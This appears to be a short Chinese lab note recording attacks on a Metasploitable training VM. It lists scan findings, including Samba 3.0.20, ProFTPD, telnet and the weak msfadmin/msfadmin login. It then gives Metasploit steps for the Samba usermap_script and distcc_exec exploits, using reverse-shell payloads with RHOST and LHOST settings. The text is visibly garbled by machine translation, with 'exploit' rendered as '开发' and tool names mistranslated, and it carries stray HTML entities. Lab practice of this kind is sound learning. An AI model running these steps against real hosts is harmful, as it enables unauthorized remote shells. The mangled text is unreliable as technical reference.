Samba& distcc漏洞

漏洞测试确实是可以的& # 160;当时把文章复制下来进行再进行测试。但是没有复制到图片,实验是成功了,但是没有那么直观。

使用metasploit

对metasploitable靶服务器进行* * *

metasploitable是ubuntu8.0的版本

& # 160;

诺伊斯扫描到漏洞

139端口可以获取该系统主机名为“metasploitable”,注释“metasploitable服务器(Samba 3.0.20-Debian)”;

系统存在弱口令,用户用户,msfadmin密码与用户名一样,使用净使用命令能够建立连接查看共享资源.ftp开放版本信息ProFTPD 1.3.1服务器(Debian),用户这个用户在ftp中也可以使用;

telnet服务开放,可确定该系统为Ubuntu 8.04,用户用户,msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令

一个distcc漏洞

一个Samba共享服务漏洞

& # 160;

& # 160;

无国界医生组织对靶服务器的工具

smb-samba共享服务

& # 160;

使用利用/多/Samba/usermap_script

设置载荷cmd/unix/反向

设置rhost (ip地址)

设置lhost (ip地址)

开发& # 160;

使用利用/unix/misc/distcc_exec

设置载荷cmd/unix/reverse_perl

设置rhost& # 160;(ip地址)

设置lhost& # 160;(ip地址)

开发& # 160;

distcc成功但是没有根的权限

Samba& distcc漏洞